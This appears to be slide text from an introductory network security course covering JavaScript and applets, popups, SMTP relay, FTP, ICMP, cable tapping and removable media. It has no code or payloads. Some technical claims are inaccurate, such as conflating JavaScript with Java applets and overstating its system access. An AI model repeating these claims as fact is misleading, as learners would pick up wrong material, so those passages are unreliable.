JavaScript is a programming language that allows access to the system
resources of the system running the script.
These scripts can interface with all aspects of an operating system just like
programming languages, such as the C language.
This means that JavaScript scripts, when executed, can potentially damage
systems or be used to send information to unauthorized persons.
JavaScript scripts can be downloaded from a website to a client and executed
within a Web browser.
The client browser must have the ability to run Java applets in a virtual machine
on the client.
Java applets are used extensively in web servers today, and they are becoming
one of the most popular tools used for website development.
Securing Internet Connections
Popups
A Popup occurs when a Web site is opened in the foreground.
Popups are an annoyance, and some can contain inappropriate content or entice the
user to download malware.
Some popup blockers may delete the information already entered by reloading the page, causing
the users unnecessary grief.
Many popup blockers are integrated into vendor toolbars.
Field help for fill-in forms is often in the form of a popup.
A Popunder occurs when a Web site is opened in the background. Popunders are in the
same family as popups and should be prevented by enabling a popup blocker on the
user’s computer.
You can adjust the settings on popup blockers to meet the organizational policy or to
best protect the user environment:
High settings might prevent application or program installation.
Medium will block most automatic popups but still allow functionality.
You can circumvent popup blockers in various ways:
Most popup blockers block only the JavaScript; therefore, technologies such as Flash bypass the
popup blocker.
On many Internet browsers, holding down the Ctrl key while clicking a link will allow it to bypass
the popup filter.
Securing Internet Connections
SMTP Relay
SMTP relay is a feature designed into many e-mail servers that
allows them to forward e-mail to other e-mail servers.
The main purpose of implementing an e-mail relay server is to
protect the primary e-mail server by reducing the effects of
viruses and port scan attacks.
Initially, the SMTP relay function was intended to help bridge
between systems. This capability allows e-mail connections
between systems across the Internet to be made easily.
Unfortunately, this feature has been used to generate a great
deal of spam on the Internet.
You should configure your e-mail server to prevent e-mail relay
because e-mail relay can result in untraceable, unwanted,
unsolicited e-mail messages being sent.
Working with File Transfer Protocol
FTP servers provide user access to upload or download files between client systems and
a networked FTP server. FTP servers include many potential security issues, including
anonymous file access and unencrypted authentication.
FTP has three separate functions. FTP is a protocol, a client, and a server.
The client system runs a program called FTP.
The server runs a service called FTP server.
The FTP client and server communicate using the FTP protocol.
The client requests a connection to a server that runs the FTP service.
The client and server communicate using a protocol that defines the command structure and interactions
between the client and server.
Early FTP servers based security on the honor system. Most logons to an FTP site used
the anonymous logon, conventionally, the user's e-mail address, and the password was
anonymous. In this situation, the only security offered is what is configured by the
operating system.
The major security vulnerability of FTP is that the user ID and password are not
encrypted and is sent in clear text. This allows it to be subject to packet capture; a major
security breach-especially if you are connecting to an FTP server across the Internet.
The only protection is to implement Secure FTP (SFTP) or to implement FTP with
Transport Layer Security (TLS) or Secure Sockets Layer (SSL). Secure FTP (SFTP) is
accomplished using a protocol called Secure Shell (SSH).
Understanding Network Protocols
ICMP and SNMP (4:39)
Simple Network Management Protocol (SNMP) is used to monitor network devices.
SNMP is used for monitoring the health of network equipment, computer equipment,
and devices like UPS. It uses port 161 to communicate.
Internet Control Message Protocol (ICMP) is used for destination and error reporting
functions in TCP/IP.
ICMP is routable and is used by programs such as Ping and Traceroute.
ICMP is used for carrying error, control and informational packets between hosts.
ICMP is one of the favorite protocols used for DoS attacks. You can disable ICMP through
the router to prevent these types of situations from occurring.
Internet Group Management Protocol (IGMP) is used for group messaging and
multicasting. IGMP maintains a list of systems that belong to a message group. When a
message is sent to a particular group, each system receives an individual copy.
Multicasting, can consume huge amounts of bandwidth in a network and possibly create
a DoS situation. Most network administrators disable the reception of broadcast and
multicast traffic from outside their local network.
The Basics of Cabling, Wires, and Communications
Coax
Coaxial cabling has a center conductor which
is used to carry data from point to point. The
center conductor has an insulator wrapped
around it. A shield is found over the insulator,
and a nonconductive sheath is found around
the shielding.
Coaxial cabling is probably one of the oldest
network cabling used these days.
Coax has two primary vulnerabilities from a
security perspective.
The most common is the addition of a Tconnector attached to a network sniffer. This
sniffer would have unrestricted access to the
signaling on the cable.
The second and less common method involves
a connection called a vampire tap. A vampire tap
is a type of connection that hooks directly into a
coax by piercing the outer sheath and attaching
a small wire to the center conductor or core.
This type of attachment allows a tap to occur
almost anywhere in the network. Taps can be
hard to find because they can be anywhere in
the cable.
The two common methods of
tapping a coax cable.
The Basics of Cabling, Wires, and Communications
Unshielded Twisted Pair and Shielded Twisted Pair
UTP is broken down into seven
categories that define bandwidth and
performance.
The most common category is CAT 5,
which allows 1000Mbps bandwidth.
CAT 5 cabling is most frequently used
with 100Base-T networks.
The limit of a cable segment length of
twisted pair for use with Ethernet is
100 meters; beyond this length, the
attenuation of the cables may cause
reliability problems.
RJ-45 connectors typically connect
computers to a 100BaseTX network.
UTP and STP cabling isn’t as secure as
coax because it can be easily tapped
into, and it’s used primarily for internal
wiring. It’s more difficult to splice into
a twisted-pair cable, but three-way
breakout boxes are easy to build or
buy.
10Base-T network with a sniffer attached at the
hub.
The Basics of Cabling, Wires, and Communications
Fiber Optic
Fiber optics and its assembly continue to be very
expensive when compared to wire, and this
technology isn’t common on the desktop.
Fiber networks use a plastic or glass conductor
and pass light waves generated by a laser.
Fiber networks are considered the most secure,
although they can be tapped.
Fiber’s greatest security weakness is at the
connections to the fiber-optic transceivers. Passive
connections can be made at the connections, and
signals can be tapped from there.
The other common security issue associated with
fiber optics is that fiber connections are usually
bridged to wire connections.
The figure on the right shows how a fiber
connection to a transceiver can be tapped. This
type of splitter requires a signal regenerator for
the split to function, and it can be easily detected.
The Basics of Cabling, Wires, and Communications
Infrared
Infrared allows a point-to-point connection to be
made between two IR transceiver-equipped
devices. Many newer laptop PCs, PDAs, and
portable printers now come equipped with IR
devices for wireless communications. IR is line of
sight; it isn’t secure and can be easily intercepted.
Radio Frequencies
Radio frequency (RF) transmissions use antennas to
send signals across the airwaves. These signals can
be easily intercepted. Anyone can connect a
shortwave receiver to the sound card of a PC to
intercept, receive, and record shortwave and
higher-frequency transmissions.
Microwave Systems
A relative newcomer on the microwave
communications scene involves wireless networks.
When implementing wireless networks, you would
be wise to make sure you implement or install
communications security devices or encryption
technology to prevent the unauthorized disclosure
of information in your network. Many of the newer
devices include encryption protocols similar to
IPSec.
A shortwave transmission between
two ground sites used for text
transmission.
Tens of thousands of hobbyists
worldwide are eavesdropping.
Employing Removable Storage
Network File System (NFS), Common Internet File System (CIFS), and Server Message Block (SMB) are all protocols used by networkattached storage (NAS).
Removable storage (commonly known as removable media) refers to any type of storage device (such as a floppy drive, magnetic tape
cartridge, or CD-ROM) that can be removed from the system. Removable media is subject to viruses, physical damage, and theft.
All of these devices can store and pass viruses to uninfected systems. Make sure that all files are scanned for viruses before they’re
copied to these media.
CD-R/DVD-R
The CD Recordable (CD-R) allows CDs to be burned on a computer. Most new computer systems come standard with a CD-R burner or
CD-R drive. You can quickly back up data to or restore data from the CD-R. Data theft is easy with a CD-R; an attacker can get on a
system that has a CD-R and copy data from hard disks or servers.
Diskettes
Diskettes have properties similar to hard drives, although they usually store smaller amounts of data. They’re one of the primary
carriers of computer viruses, and they can be used to make copies of small files from hard disks.
Flash Cards
Flash cards, also referred to as memory sticks, are small memory cards that can be used to store information. A system that has a
flash card interface usually treats flash cards like a hard drive. Flash cards can carry viruses, and they can be used to steal small
amounts of information from systems that support them.
Most PDA devices accept flash cards, making them susceptible to viruses that are targeted at PDAs.
Hard Drives
Hard drives can be quickly removed from systems, and portable hard drives can be easily attached. Imaging software can be used to
download a system onto a hard drive in minutes.
Another aspect of hard drive security involves the physical theft or removal of the drives. Hard drives are also susceptible to viruses
because they’re the primary storage devices for most computers.
Employing Removable Storage
Network Attached Storage
Most network attached storage (NAS) devices are simply computers dedicated to the task of storing files
for users on the network. The users connect to the NAS units typically through Network File System (NFS)
or Server Message Blocks (SMB) communication with network file servers.
Smart Cards
Smart cards are used for access control, and they can contain a small amount of information. Smart cards
are replacing magnetic cards, in many instances because they can store additional personal information
and are harder to copy or counterfeit.
Smart cards are difficult to counterfeit, but they’re easy to steal. Once a thief has a smart card, they have
all the access the card allows. To prevent this, many organizations don’t put any identifying marks on their
smart cards, making it harder for someone to utilize them. A password or PIN is required to activate many
modern smart cards, and encryption is employed to protect the contents.
Tape
The most common backup and archiving media in large systems is tape. Tape provides the highest-density
storage in the smallest package.
Tape can be restored to another system, and all the contents will be available for review and alteration. It’s
relatively easy to edit a document, put it back on the tape, and then
restore the bogus file back to the original computer system. This, of course, creates an integrity issue that
may be difficult to detect.
Thumb Drives
Thumb drives allow you to store a large quantity of data on something that easily fits into your pocket.
Being nothing more than storage media, thumb drives are susceptible to holding the same malware as
other forms of removable media.
The End